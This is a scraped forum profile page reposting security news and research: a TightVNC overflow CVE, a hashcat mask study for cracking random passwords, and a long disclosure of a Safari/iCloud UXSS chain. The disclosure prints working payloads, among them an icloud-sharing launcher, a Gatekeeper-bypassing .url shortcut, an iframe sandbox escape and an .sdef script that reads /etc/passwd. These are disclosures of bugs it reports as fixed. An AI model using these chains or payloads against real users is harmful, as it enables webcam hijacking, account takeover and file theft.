-
Posts
18664 -
Joined
-
Last visited
-
Days Won
681
Everything posted by Nytro
-
CVE-2022-23967 In TightVNC 1.3.10, there is an integer signedness error and resultant heap-based buffer overflow in InitialiseRFBConnection in rfbproto.c (for the vncviewer component). There is no check on the size given to malloc, e.g., -1 is accepted. This allocates a chunk of size zero, which will give a heap pointer. However, one can send 0xffffffff bytes of data, which can have a DoS impact or lead to remote code execution. [Vulnerability Type] Buffer Overflow [Vendor of Product] TightVNC [Affected Product Code Base] vncviewer - 1.3.10 [Affected Component] file : rfbproto.c, function : InitialiseRFBConnection , line of code : 307 [Attack Type] Remote [Impact Denial of Service] true [Attack Vectors] You just need to setup a fake server, to interact with the vulnerable client. [Discoverer] Maher Azzouzi [Reference] https://www.tightvnc.com/licensing-server-x11.php Use CVE-2022-23967. Sursa: https://github.com/MaherAzzouzi/CVE-2022-23967
-
RECOVERING RANDOMLY GENERATED PASSWORDS January 25, 2022 By Hans Lakhan in Password Audits, Penetration Testing, Policy Development, Red Team Adversarial Attack Simulation, Security Program Management, Security Testing & Analysis TL;DR – Use the following hashcat mask files when attempting to crack randomly generated passwords. 8 Character Passwords masks_8.hcmask 9 Character Passwords masks_9.hcmask 10 Character Passwords masks_10.hcmask When testing a client’s security posture, TrustedSec will sometimes conduct a password audit. This involves attempting to recover the plaintext password by extracting and cracking the NTLM hashes of accounts in a Windows domain. On average, TrustedSec is able to recover between 50-70% of these passwords because most users continue to choose ‘bad’ passwords, such as Winter2021!, December21!, etc. As password managers like Thycotic Secret Server, LastPass, and HashiCorp Vault grow in popularity, the use of randomly generated passwords has increased. This poses a challenge for password recovery, as up until now, the only feasible way to address this issue was to perform resource intensive brute-force attacks. These attacks typically mean trying every single character in every single position of the password (a-z, A-Z, 0-9) and all the symbols on the keyboard. (We’re sticking to English characters here.) The result is 95 characters per position, and with an 8-character password, that means 95^8 possible combinations to test (6,634,204,312,890,625 to be exact). 630,249,409,724,609,375 for 9-character passwords and 59,873,693,923,837,890,625 for 10-character passwords. Even though TrustedSec has some powerful password crackers that can cover the entire 95^8 key space in less than a day, as soon as we bump it up to 9 or 10-character passwords, recovery becomes unfeasible. But…do we NEED to test every combination? There’s got to be a better way! Hypothesis Let’s presume you’ve encountered a set of hashes you knew were used in a Windows Domain environment and were randomly generated to be 8 characters in length. Immediately, we know that to adhere to password complexity requirements, the password must include 3 of the 4 character classes—uppercase letters, lowercase letters, numbers, and/or symbols. This means, when considering our key space from above, that we don’t need to test for passwords of all the same characters such as aaaaaaaa or 11111111. Furthermore, because of complexity requirements, you don’t need to test for passwords that are exclusively 2-character classes like aaaa1111. Taking this a step further, in casually observing randomly generated passwords, I noticed that I rarely see ones using a high quantity of a particular character class. To put it another way, I don’t think I’ve ever seen something like acbdef1! that has six consecutive lowercase letters. If this is true, could we improve our password cracking efforts by removing test cases that rarely or never happen? Experimentation To start, I used LastPass-cli to generate my data sets. I should note that I only used LastPass for my tests because it’s what I had available to me. It is, by no means a bad product, and this blog post is not intended to highlight any security weakness with it. I generated three files containing 1 million passwords, each of 8, 9, and 10 characters in length. The commands to do this are as follows: export LPASS_AGENT_TIMEOUT=0 for i in $(seq 1 1000000);do lpass generate --sync no _tmp 8 >> ~/1M_8.txt;done for i in $(seq 1 1000000);do lpass generate --sync no _tmp 9 >> ~/1M_9.txt;done for i in $(seq 1 1000000);do lpass generate --sync no _tmp 10 >> ~/1M_10.txt;done Next, using a quick Python script, I enumerated all the character classes I found in each file and put them into a spreadsheet, and graphed them out. In reviewing these spreadsheets, there are a few things that immediately stood out. First, regardless of the length of the randomly generated password, the vast majority had one to two digits. Additionally, regardless of the overall length of the generated passwords, none contained eight or more digits. In showing these results to my coworkers, a wise Logan Sampson asked a good question: ‘Are these results at all affected by the weight of some character class(es) over others?’ That is to say, of the 95 possible characters our random password generator could pick from, only 10 are digits. Therefore, it would make sense that digits are less common in randomly generated passwords. Of the Following Key Space: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ «space»!”#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 10.53% Are digits 27.37% Are lowercase letters 27.37% Are uppercase letters 34.74% Are symbols To test this theory, I went back and tallied how frequently each individual character appeared in all the passwords. Here are the results: Logan was correct. The character distribution across all the passwords of all tested lengths is the same, which is great to see. An interesting side note…it appears that LastPass does not include the space character in its randomly generated passwords! This means our key space for characters to test can be reduced by one. Woo, efficiencies! Regardless, we can use the fact that some character classes are more likely to appear in a randomly generated password over others to our advantage. We could build a recovery method that uses statistically likely character classes. To build our attack we’re going to use hashcat’s mask attack. If you’re unfamiliar with hashcat masks, we can essentially instruct hashcat to test all possible characters of a given set by using the following table: Mask Character Set ?l abcdefghijklmnopqrstuvwxyz ?u ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d 0123456789 ?h 0123456789abcdef ?H 0123456789ABCDEF ?s «space»!”#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a ?l?u?d?s ?b 0x00 – 0xff For example, if we wanted to test all possible permutations of a password that was 4 characters in length and consisted of only lowercase letters, we’d use ?l?l?l?l. We can even specify custom character sets. For example, if I only wanted to test lowercase letters and digits, I would use -1 ?l?d to define a new character class 1. Then I could specify ?1?1?1?1?1?1?1?1 to make a mask to test all possible combinations of lowercase letters and digits for 8-character passwords. Using the character class distributions, we’ll create the masks below. We’ll also swap out hashcat’s standard ?s to denote all symbols and replace ?s with our custom class to exclude the space character. Special Character Class -1 !”#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 8 Characters Character Class Count Mask Lower Alpha 2 ?u?u Upper Alpha 2 ?l?l Digit 1 [1] ?d Symbol 3 ?1?1?1 [1] Technically, in our graphing, we see that zero digits is more frequent than one digit, but for this test I’m going to force a minimum of one digit. 9 Characters [2] Character Class Count Mask Lower Alpha 2 ?l?l Upper Alpha 3 ?u?u?u Digit 1 ?d Symbol 3 ?1?1?1 [2] We could have easily swapped the values for Lower Alpha and Upper Alpha because their frequencies were relatively the same for 9-character passwords. 10 Characters Character Class Count Mask Lower Alpha 3 ?l?l?l Upper Alpha 3 ?u?u?u Digit 1 ?d Symbol 3 ?1?1?1 Focusing on 8-character passwords, our mask now looks something like: ?u?u?l?l?s?s?s?d. We should pay attention to the position of each character class to ensure that we test all possible combinations of these character class sets. Meaning, using the above character class sets, we need to build a list of masks like: ?u?u?l?l?s?s?s?d ?u?u?l?l?s?s?d?s ?u?u?l?l?s?d?s?s ?u?u?l?l?d?s?s?s ?u?u?l?d?l?s?s?s … So, how many permutations will we need? To find out, normally you would take the total number of positions and find their factorial to get the answer (8x7x6x5x4x3x2x1). Because we are only interested in the unique patterns, we would do: The numerator is the length of the password factorial, and the denominator is the number in each character class factorial. In our case, 1,080 different hashcat masks are required for our 8-character long password. Numbers numbers numbers, math math math… Thankfully, hashcat supports submitting a file of masks appropriately called an hcmask file. So, after generating a file of 1,680 masks, I tested my theory in several ways: Tested the 1,680 masks against the initial set of 1M randomly generated 8-character passwords Tested the 1,680 masks against a new set of 1M randomly generated 8-character passwords Tested the 1,680 masks against ALL uncracked NTLM hashes in TrustedSec’s list of unrecovered hashes Then I repeated the above for the 9 and 10-character masks and recorded the rate of cracked hashes over a period of 1 hour, 2 hours, and 3 hours. For a baseline, I also measured the total number of hashes recovered while using the standard brute-force methods. All tests were performed using 2x GeForce RTX 2080 Ti’s. The results are as follows: 8 Characters 1 hour Hashfiles Standard Brute-Force TrustedSec 1,680 hcmasks Initial 1M 8-character Passwords 28,825 (2.88%) 29,314 (2.93%) New set of 1M 8-character Passwords 24,638 (2.46%) 29,126 (2.91%) All Uncracked NTLM Hashes 30 (0.003%) 0 (0.00%) 8 Characters 2 hours Hashfiles Standard Brute-Force TrustedSec 1,680 hcmasks Initial 1M 8-character Passwords 67,439 (6.74%) 37,520 (3.75%) (77 Minutes) New set of 1M 8-character Passwords 68,299 (4.69%) 37,391 (3.74%) (78 Minutes) All Uncracked NTLM Hashes 50 (0.005%) 0 (0.00%) (72 Minutes) 8 Characters 3 hours Hashfiles Standard Brute-Force TrustedSec 1,680 hcmasks Initial 1M 8-character Passwords 106,529 (10.65%) 37,520 (3.75%) (77 Minutes) New set of 1M 8-character Passwords 107,498 (10.75%) 37,391 (3.74%) (78 Minutes) All Uncracked NTLM Hashes 62 (0.006%) 0 (0.00%) (72 Minutes) 9 Characters 1 hour Hashfiles Standard Brute-Force TrustedSec 5,040 hcmasks Initial 1M 9-character Passwords 0 (0.00%) 321 (0.03%) New set of 1M 9-character Passwords 0 (0.00%) 310 (0.03%) All Uncracked NTLM Hashes 0 (0.00%) 2 (0.00%) 9 Characters 2 hours Hashfiles Standard Brute-Force TrustedSec 5,040 hcmasks Initial 1M 9-character Passwords 0 (0.00%) 630 (0.06%) New set of 1M 9-character Passwords 0 (0.00%) 630 (0.06%) All Uncracked NTLM Hashes 0 (0.00%) 2 (0.00%) 9 Characters 3 hours Hashfiles Standard Brute-Force TrustedSec 5,040 hcmasks Initial 1M 9-character Passwords 0 (0.00%) 935 (0.09%) New set of 1M 9-character Passwords 0 (0.00%) 936 (0.09%) All Uncracked NTLM Hashes 0 (0.00%) 4 (0.00%) 10 Characters 1 hour Hashfiles Standard Brute-Force TrustedSec 16,800 hcmasks Initial 1M 10-character Passwords Overflow 3 (0.00%) New set of 1M 10-character Passwords Overflow 3 (0.00%) All Uncracked NTLM Hashes Overflow 0 (0.00%) 10 Characters 2 hours Hashfiles Standard Brute-Force TrustedSec 16,800 hcmasks Initial 1M 10-character Passwords Overflow 5 (0.00%) New set of 1M 10-character Passwords Overflow 8 (0.00%) All Uncracked NTLM Hashes Overflow 0 (0.00%) 10 Characters 3 hours Hashfiles Standard Brute-Force TrustedSec 16,800 hcmasks Initial 1M 10-character Passwords Overflow 10 (0.01%) New set of 1M 10-character Passwords Overflow 14 (0.01%) All Uncracked NTLM Hashes Overflow 0 (0.00%) Conclusion Did we find a better way to crack randomly generated passwords? Looking at the tables above, we can see that using these masks does get us more results in a shorter period of time when used with randomly generated passwords, but their effectiveness is not sustainable This is because the brute-force approach covers the entire possible key space, whereas our masks only cover a subset. Put another way, these masks cover the more common random password character classes instead of attempting all possible character classes, and therefore using them can sometimes result in a quicker recovery of a randomly generated password. Sursa: https://www.trustedsec.com/blog/recovering-randomly-generated-passwords/
-
Fuzzing Labs - Patrick Ventuzelo Fuzzing Labs - Patrick Ventuzelo 📥 Download source code and materials: https://academy.fuzzinglabs.com/intro... In this video, I will show how to find vulnerability inside an Ethereum smart contract written in Solidity using echidna, one of the only Ethereum smart contract fuzzer. #Fuzzing #Ethereum #Solidity 00:00 Introduction 01:00 Get started with echidna 01:50 Basic echidna test with testme.sol 03:00 Echidna invariants 05:45 Missing.sol smart contract target 07:25 Calling echidna on Missing.sol 08:40 Echinda detect the issue 09:05 Other echidna interesting examples 11:22 Goig deeper ==== 💻 FuzzingLabs Training ==== - C/C++ Whitebox Fuzzing: https://academy.fuzzinglabs.com/c-whi... - Rust Security Audit and Fuzzing: https://academy.fuzzinglabs.com/rust-... - WebAssembly Reversing and Dynamic Analysis: https://academy.fuzzinglabs.com/wasm-... - Go Security Audit and Fuzzing: https://academy.fuzzinglabs.com/go-se... ==== 🦄 Join the community ==== https://academy.fuzzinglabs.com/fuzzi... ==== 📡 Socials ==== - Twitter: https://twitter.com/FuzzingLabs - Telegram: https://t.me/fuzzinglabs Keywords: Fuzzing, Fuzz Testing, Ethereum, Solidity, ETH, smart contract Link to this video: https://youtu.be/EA8_9x4D3Vk
-
Busra Demir Hey all, This is a video tutorial on bypassing Data Execution Policy (DEP) using Return Oriented Programming (ROP) chains. We'll go through the fully manual exploitation with lots of assembly tricks. I also brainstormed on the ideas for the next videos so feel free to drop a comment. Hope you enjoy the tutorial. Cheers!
-
Alert: Let's Encrypt to revoke about 2 million HTTPS certificates in two days Relatively small number of certs issued using a verification method that doesn't comply with policy Thomas Claburn in San Francisco Wed 26 Jan 2022 // 21:26 UTC Let's Encrypt, a non-profit organization that helps people obtain free SSL/TLS certificates for websites, plans to revoke a non-trivial number of its certs on Friday because they were improperly issued. In a post to the Let's Encrypt discussion community forum, site reliability engineer Jillian Tessa explained that on Tuesday, a third party reported "two irregularities" in the code implementing the "TLS Using ALPN" validation method (BRs 3.2.2.4.20, RFC 8737) in Boulder, its Automatic Certificate Management Environment (ACME) software. "All active certificates that were issued and validated with the TLS-ALPN-01 challenge before 0048 UTC on 26 January 2022 when our fix was deployed are considered mis-issued," explained Tessa. "In compliance with the Let's Encrypt CP [Certificate Policy], we have 5-days to revoke and will begin to revoke certificates at 1600 UTC on 28 January 2022." Let's Encrypt estimates that less than one per cent of active certificates are affected; this is still a large number – about two million, according to a spokesperson – given that there are currently about 221 million active Let's Encrypt-issued certificates. Affected certificate holders will be notified of the revocation by email, at which point certificate renewal will be necessary. This is not the remediation of an exploit. "The update to the TLS-ALPN-01 challenge type was made to be in compliance with the Baseline Requirements, which requires use of TLS 1.2 or higher," a spokesperson for Let's Encrypt told The Register in an email. Let's Encrypt completes huge upgrade, can now rip and replace 200 million security certs in 'worst case scenario' Web trust dies in darkness: Hidden Certificate Authorities undermine public crypto infrastructure Xero, Slack suffer outages just as Let's Encrypt root cert expiry downs other websites, services A third of you slackers out there still aren't using HTTPS by default When you get a certificate from Let's Encrypt, the organization's servers attempt to validate that you have control over the relevant resources by presenting a challenge, per the ACME standard. This challenge may be conducted using HTTP, DNS, or TLS, depending upon what works or doesn't work with the client setup. It's similar in concept to sending an email verification link that must be clicked to complete the setup of an online account. The TLS-ALPN-01 challenge is available for those unable or unwilling to use port 80 for an HTTP-01 challenge. According to Let's Encrypt, "It is best suited to authors of TLS-terminating reverse proxies that want to perform host-based validation like HTTP-01, but want to do it entirely at the TLS layer in order to separate concerns." Let's Encrypt developer Aaron Gable said in a separate post that two changes were made to the organization's verification code affecting client applications that specifically use TLS-ALPN-01. First, the software now enforces network negotiation using TLS 1.2 or higher. Previously the code allowed connections over TLS 1.1, which is now considered to be insecure. Second, the software no longer supports the legacy OID (Object Identifier) 1.3.6.1.5.5.7.1.30.1, which served to identify the "acmeIdentifier" extension in early versions of RFC 8737. The Let's Encrypt software now only accepts the standardized OID 1.3.6.1.5.5.7.1.31. Certificate verification attempts using TLS 1.1 or the discontinued OID will fail under the revised software; those certificates verified via TLS-ALPN-01 under the old code fail to comply with Let's Encrypt policy and thus need to be reissued. ® Sursa: https://www.theregister.com/2022/01/26/lets_encrypt_certificates/
-
Hacking the Apple Webcam (again) Gaining unauthorized camera access via Safari UXSS: the story of how a shared iCloud document can hack every website you've ever visited. Summary It's been over a year since my last Apple camera hacking project, so I decided to give it another go. My hack successfully gained unauthorized camera access by exploiting a series of issues with iCloud Sharing and Safari 15. While this bug does require the victim to click "open" on a popup from my website, it results in more than just multimedia permission hijacking. This time, the bug gives the attacker full access to every website ever visited by the victim. That means in addition to turning on your camera, my bug can also hack your iCloud, PayPal, Facebook, Gmail, etc. accounts too. This research resulted in 4 0day bugs (CVE-2021-30861, CVE-2021-30975, and two without CVEs), 2 of which were used in the camera hack. I reported this chain to Apple and was awarded $100,500 as a bounty. Background Apple fixed my last 0day chain (CVE-2020-3852 + CVE-2020-3864 + CVE-2020-3865) by making camera access drastically more difficult. Now multimedia access is only allowed when the protocol is "https:" and the domain matches your saved settings. This means that cleverly malformed URIs won't cut it anymore. Now we need to genuinely inject our evil code into the target origin. In other words, we need to find a Universal Cross-Site Scripting (UXSS) bug. But what exactly is UXSS? Google Project Zero has a nice summary in their paper, "Analysis of UXSS exploits and mitigations in Chromium" - "UXSS attacks exploit vulnerabilities in the browser itself [...] to achieve an XSS condition. As a result, the attacker does not just get access to user session on a single website, but may get access to any [website]." The authors of this paper go on to call UXSS "among the most significant threats for users of any browser" and "almost as valuable as a Remote Code Execution (RCE) exploit with the sandbox escape." Sounds pretty great, right? Imagine building a website that can jump into https://zoom.com to turn on the camera, hop into https://paypal.com to transfer money, and hijack https://gmail.com to steal emails. Before we go any further, I should clarify how exactly this bug differs from my last Safari Camera Hacking project. That bug specifically targeted stored multimedia permissions. It did not give me the ability to execute code on arbitrary origins. Check out my attack diagram to see which origins were being used. In other words, that hack let me leverage Skype's camera permission but did not let me steal Skype's cookies. Let's try to find a UXSS bug in the latest version of Safari (Safari v15 beta at time of writing). As always, the first step is to do a lot of research into prior work. After all, the best security research comes from standing on the shoulders of giants. The Attack Plan After reading numerous write-ups about patched Safari UXSS bugs, I decided to focus my research on webarchive files. These files are created by Safari as an alternative to HTML when a user saves a website locally. Safari saving a website as a Webarchive file A startling feature of these files is that they specify the web origin that the content should be rendered in. Webarchive File Format This is an awesome trick to let Safari rebuild the context of the saved website, but as the Metasploit authors pointed out back in 2013, if an attacker can somehow modify this file, they could effectively achieve UXSS by-design. According to Metasploit, Apple did not view this attack scenario as very realistic because "the webarchives must be downloaded and manually opened by the client." Granted this decision was made nearly a decade ago, when the browser security model wasn't nearly as mature as it is today. Apple's decision to support this ultra-powerful filetype gave way to an era of hackers trying to forcefully open them on victims' machines. Fundamentally, this attack can be broken into two steps: 1) Forcefully download an evil webarchive file 2) Forcefully open it Until recently, there were no protections to prevent step #1. Prior to Safari 13, no warnings were even displayed to the user before a website downloaded arbitrary files. So planting the webarchive file was easy. (Now with Safari 13+, users are prompted before each download) Opening the webarchive file was trickier, but still manageable by somehow navigating to the file:// URI scheme. Back when Safari's error pages lived on the file:// scheme, hackers figured out how to purposely invoke an error page to just alter its pathname, a hack delightfully dubbed "Errorjacking." See here and here for two variations. Another approach that worked back in the day was to simply set the <base> tag to file://. Fast forward to 2022 and things get a lot harder. Not only are auto-downloads prevented by default, but webarchive files are considered malicious applications by macOS Gatekeeper. This means that users can't even manually open foreign webarchives themselves anymore. Apple seems to have changed their 2013 stance about how dangerous these files can be. Download prompt in Safari 13+ Gatekeeper Launch Prevention Still, webarchive files just seem too juicy to give up on. Let's explore how this old-school hack can still occur on the latest Safari and macOS builds. Exploration of custom URI Schemes I found success with my last Safari Camera Hacking project by conducting a deep dive into official IANA-registered URI schemes. This project was heavily guided by RFCs and public documentation. But there is an entire world of custom URL schemes that I neglected to talk about. These unofficial and (mostly) undocumented schemes are usually used by third party iOS/macOS apps as a form of deep linking. There is actually an entire community built around discovering and using these schemes cross-app for both fun and hacking projects. An interesting note is that several first-party system apps such as Apple Help Viewer (help://), FaceTime (facetime-audio://), and Apple Feedback (applefeedback://) also support custom URI schemes. Abusing these schemes from a website in Safari is not a novel technique. Indeed, hackers have been finding ways to use custom schemes to launch (and exploit bugs in) system applications for a while now. Hacks range from annoyingly placing calls, aiding in social engineering, to arbitrary file execution. Seriously, there is some awesome research in this space. To help combat these attacks, modern versions of Safari warn the user before blindly launching secondary applications. That is, unless they are one of the hardcoded exceptions identified in this great Blackhat presentation. Custom URI Schemes that Safari will launch without Prompt All of these schemes are registered with Launch Services, so you can list them (and others) via this command: /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -B6 bindings:.*: | grep -B6 apple-internal After digging through internal Apple schemes and cross-referencing them with the ones trusted by Safari, I found one that caught my eye- "icloud-sharing:". This scheme appears to be registered by an iCloud Sharing Application called "ShareBear." LaunchServices data about the icloud-sharing: scheme ShareBear was interesting to me because sharing iCloud documents seemed like a plausible path towards downloading & launching webarchive files. I couldn't find any publicly available documentation or research about this scheme so I just started poking at it myself. ShareBear Application At this point we have identified an application that can be automatically launched by Safari, however we do not know how to correctly open it yet. Luckily, it was pretty straight forward. Some quick research shows that iCloud File Sharing can generate a public Share Link. Creating a public iCloud Share Link These Share Links look something like this: https://www.icloud.com/iclouddrive/01fooriERbarZSTfikqmwQAem Simply replacing "https" with "icloud-sharing" is all that's needed to have Safari automatically open ShareBear with this file as a parameter. <script> location.href = 'icloud-sharing://www.icloud.com/iclouddrive/01fooriERbarZSTfikqmwQAem" </script> evil.html Great, so what does ShareBear do now? Some quick testing showed this behavior: ShareBear Behavior Flowchart There is a subtle, but wildly impactful, design flaw with this behavior. Let's dig into what happens if the user has not opened this file before. The user will be shown a prompt, similar to the one below. ShareBear Open Prompt This innocuous little prompt, with the default value of "Open," seems pretty straightforward. A user should expect to have the image, example.png, opened if they agree. But in actuality, they are agreeing to much more than that. Once the user clicks Open, the file is downloaded onto the victim's machine at the location /Users/<user>/Library/Mobile Documents/com~apple~CloudDocs then automatically opened via Launch Services. Then the user will never see this prompt again. From that point forward, ShareBear (and thus any website in Safari) will have the ability to automatically launch this file. The truly problematic part of this agreement is that the file can be changed by anybody with write access to it. For example, the owner of the file could change the entire byte content and file extension after you agree to open it. ShareBear will then download and update the file on the victim's machine without any user interaction or notification. In essence, the victim has given the attacker permission to plant a polymorphic file onto their machine and the permission to remotely launch it at any moment. Yikes. Agreed to view my PNG file yesterday? Well today it's an executable binary that will be automatically launched whenever I want. Apple fixed this behavior in macOS Monterey 12.0.1 as a result of my report without issuing a CVE because it is more of a design flaw than a bug per-se. Bonus Bug: Iframe Sandbox Escape While fuzzing the icloud-sharing:// scheme, I stumbled upon a fun bug unrelated to the UXSS hunt. ShareBear appears to check the path of the URL for "/iclouddrive/*" before performing the behavior outlined above. If the path happens to be "/photos/*" then ShareBear makes a pretty silly mistake. It will tell Safari to open a new tab pointing to the iCloud web app... but it does not verify that the domain name is actually the iCloud web app. In normal operation, the user is simply presented with the website, "https://photos.icloud.com." However because this domain name is never validated, we can trick ShareBear into instructing Safari into opening a new tab to any website. The implications of this behavior may not be obvious. This doesn't seem all that different than just calling window.open('https://example.com') normally. However there are situations in the web where websites aren't allowed to do that. One example is if popup blocker is enabled. Another, more devious, example is when your website is inside of a sandboxed iframe. The sandbox iframe attribute is typically used when you want to embed untrusted 3rd party content on your website. For example, you may want to display an ad banner on your blog but you don't want this ad to be able to run JavaScript (who knows, maybe the ad author has a browser 0day). An important rule for sandboxed iframes is that new windows opened from that iframe should inherit the same restrictions as the iframe itself. Otherwise escaping the sandbox would be as trivial as opening a popup. Well this bug tricks Safari into opening a 'fresh' new tab without any sandbox restrictions! <html> <head> <meta http-equiv="refresh" content="0;URL='icloud-sharing://example.com/photos/foo'" /> </head> </html> Website trapped in a Sandboxed Iframe So ShareBear neglecting to verify the domain gives us an easy popup-blocker bypass and an iframe sandbox escape. Nice! (fixed in Safari 15.2 without being assigned a CVE) Live demo on BugPoC - https://bugpoc.com/poc#bp-S4HH6YcO PoC ID: bp-S4HH6YcO, Password: loVEDsquId01. Note this demo will only work with Safari <15.2 pre macOS Monterey 12.1. Now back to the Camera/UXSS hunt. Quarantine and Gatekeeper Quick reminder of where we are - Our website can prompt the user to open a shared PNG file. If the user agrees, we can automatically launch this file at any point in the future, even after we alter the file content and extension. The attacker can then modify the file on his own machine and ShareBear will take care of updating it on the victim's machine. Attacker's Machine 00:0000:20 Victim's Machine 00:0000:05 Mutating the Polymorphic File The attacker's website can then automatically launch this newly-updated file using the same icloud-sharing:// URL that he used to display the original prompt. This seems very close to our goal of forcefully downloading & opening an evil webarchive file. We can just swap out the content of puppy.png for a webarchive file and rename it "evil.webarchive", right? Unfortunately for us, pesky macOS Gatekeeper won't allow that. Gatekeeper Launch Prevention It appears that ShareBear correctly gives downloaded files the 'com.apple.quarantine' attribute and according to Apple, "Gatekeeper prevents quarantined executable files and other similar files (shell scripts, web archives, and so on) from opening or executing." For a deep dive into how macOS treats this attribute, as well as how Gatekeeper performs code signing, check out this great write-up. For our purposes, there are two big limitations introduced by this OS protection - 1) We can't run our own apps 2) We can't directly open webarchive files Side Bar - while we can't run our own apps, launching existing, approved, apps is trivial. Just use a fileloc to point to a local app (this technique is quite common). This attack is sometimes referred to as "Arbitrary File Execution" and is often misunderstood because it looks so scary. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>URL</key> <string>file:///System/Applications/Calculator.app</string> </dict> </plist> fileloc pointing to macOS Calculator 00:0000:06 Using the icloud-sharing:// scheme to launch the fileloc While this attack might look scary, launching an already-approved app doesn't have much impact. Let's focus on opening webarchives. Shortcuts The above technique to open local apps is reminiscent of an old-school symlink attack. It basically just uses a "shortcut" to trick software into opening something it doesn't expect. Lots of different operating systems and applications have reinvented the wheel over the years when it comes to shortcuts. Nowadays, the term "shortcut" could be referring to a Unix symlink, a macOS alias, a Window's linkfile, a Safari webloc, an Edge bookmark, etc. I was hopeful that I could use this technique to bypass Gatekeeper and open a webarchive file. This idea seemed promising to me because the actual application I want to open is Safari (an existing, approved, application). Gatekeeper doesn't have a problem with me launching Safari, it just gets upset when I attempt to open any file ending in ".webarchive". So I needed to find a shortcut filetype that launches Safari, then tells Safari to open a different file. After some trial and error, I found just that - the ancient Windows URL File! [{000214A0-0000-0000-C000-000000000046}] Prop3=19,2 [InternetShortcut] URL=file:///path/to/webarchive IDList= evil.url file pointing to a local webarchive Launching evil.url successfully opens Safari and instructs it to load the webarchive file without asking Gatekeeper for permission! (CVE-2021-30861) There was only one small hiccup - I need to know the full path to the webarchive file. Assuming the webarchive gets downloaded via ShareBear, it will live in /Users/<user>/Library/Mobile Documents/com~apple~CloudDocs, which includes the victim's username (not a very scalable attack). Luckily, there is a neat trick to circumvent this requirement - we can mount the webarchive file into the known /Volumes/ directory using a DMG file. 00:0000:09 Using the icloud-sharing:// scheme to mount the dmg Now we know exactly where the webarchive file resides. Which means the below evil.url file will work every time. [{000214A0-0000-0000-C000-000000000046}] Prop3=19,2 [InternetShortcut] URL=file:///Volumes/folder/evil.webarchive IDList= evil.url file pointing to a known-location local webarchive 00:0000:10 Using the icloud-sharing:// scheme to launch evil.url to open evil.webarchive And just like that, we are executing JavaScript code anywhere we want. The above screen recording injects 'alert(origin)' in https://google.com. Let's tie this together into one final attack. Full Chain Using ShareBear to download and open a webarchive file for us can be broken down into 3 steps: 1) Trick the victim into giving us permission to plant the polymorphic file 2) Turn puppies.png into evil.dmg and launch it 3) Turn evil.dmg into evil.url and launch it Of course turning "File A" into three different payloads will require some server-side coordination. Another (less fun) way to pull-off this attack is to have the victim agree to open a shared folder that already has all the files ready-to-go. 00:0000:12 Screen Recording of UXSS via viewing an iCloud Shared Folder In the above screen recording, the victim agrees to view a folder that contains some PNG images. This folder also has two hidden files - .evil.dmg & .evil.url. The website uses the icloud-sharing:// URL Scheme to automatically launch both of the hidden files to successfully bypass Gatekeeper and open a webarchive file. Note that no additional prompts are displayed to the victim after he agrees to view the shared folder. The example webarchive file above injects code into https://www.icloud.com to exfiltrate the victim's iOS camera roll. Of course this is just an example, this UXSS attack allows the attacker to inject arbitrary code into arbitrary origins. It would be just as easy to inject JavaScript code to turn on the webcam when hijacking a trusted video chat website like https://zoom.us or https://facetime.apple.com. Mission accomplished. Screenshot of UXSS hijacking Zoom Website to turn on webcam Remediation So how did Apple fix these issues? The first fix was to have ShareBear just reveal files instead of launch them (fixed in macOS Monterey 12.0.1 without being assigned a CVE). The second fix was to prevent WebKit from opening any quarantined files (fixed in Safari 15 as CVE-2021-30861; see fix implementation here). Bonus Material (#1) Before I discovered the evil.url trick, I actually found a different way to trick Launch Services into (indirectly) opening a webarchive file. I found this bug on the latest public release of Safari (v14.1.1). A few days after reporting this bug to Apple, they informed me that the beta Safari v15 was not vulnerable. It appeared that an unrelated code refactor made v15 impervious. For completeness sake, I will quickly go over that bug anyway- The obvious way to open Safari via Launch Services is with a local html file. Once opened, this page will have the file:// URI scheme. From there, JavaScript is allowed to navigate to other file:// URIs. <script> location.href = 'file:///path/to/another/local/file'; // ok if location.protocol == 'file://' </script> local HTML file navigating to another local file So what happens if the file we are navigating to is a webarchive? Well, Safari just hangs. 00:0000:14 Screen Recording of Safari refusing to render a webarchive This annoying hang occurred for every type of page navigation I could think of (anchor href, iframe src, meta redirect, etc.) when the destination file was a webarchive. Then I found this bug: <script> location.href = 'file://fake.com/path/to/evil.webarchive'; </script> local HTML file navigating to a local webarchive file Safari forgets to perform the webarchive check when there is a host value in a file:// URL! Funny enough, this bug appears to have been introduced when Apple fixed my old file:// bug (CVE-2020-3885). When Apple informed me that Safari Beta v15 wasn't vulnerable, I went back to the drawing board and found the evil.url hack. Bonus Material (#2) There was still one thing that bugged me after I finished the UXSS chain.... it can't be used to steal local files. Sure, UXSS can be used to indirectly steal files by injecting code into https://dropbox.com or https://drive.google.com, but files exclusively on the victim's hard drive are out of reach. The excellent Blackhat Presentation I referenced earlier inspired me to look for other System applications that could run my JavaScript in a more privileged context than Safari. After digging around for a while, I stumbled upon an obscure filetype recognized my macOS Script Editor called "Scripting Additions" (.osax). These files (or rather 'bundles') contained a nested xml-based file called a "Dictionary Document" (.sdef). This dictionary document was used to display human-readable, developer-defined, terms used by an AppleScript application. Phew. The important discovery was that these xml-based files are allowed to contain HTML. As it turns out, the HTML renderer also has a JavaScript engine and this engine does not enforce SOP! (fixed in macOS Big Sur 11.6.2 as CVE-2021-30975) Which means stealing /etc/passwd is easy- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE dictionary SYSTEM ""> <dictionary> <suite name="" code=""> <command name="" code="" description=""> </command> <documentation> <html> <![CDATA[ <script> fetch('file:///etc/passwd').then(x=>{x.text().then(y=>{document.write(y);})}) </script> ]]> </html> </documentation> </suite> </dictionary> evil.sdef displaying the content of /etc/passwd Luckily for us, Gatekeeper does not mind us opening Scripting Addition files. So we just take evil.sdef, package it in evil.osax, and send it to the victim via ShareBear. Then our icloud-sharing:// URI can automatically launch it in Script Editor. 00:0200:06 Screen Recording of ShareBear opening evil.osax to steal /etc/passwd Nice, so now in addition to UXSS, this hack can also circumvent sandbox restrictions and steal local files! Conclusion This project was an interesting exploration 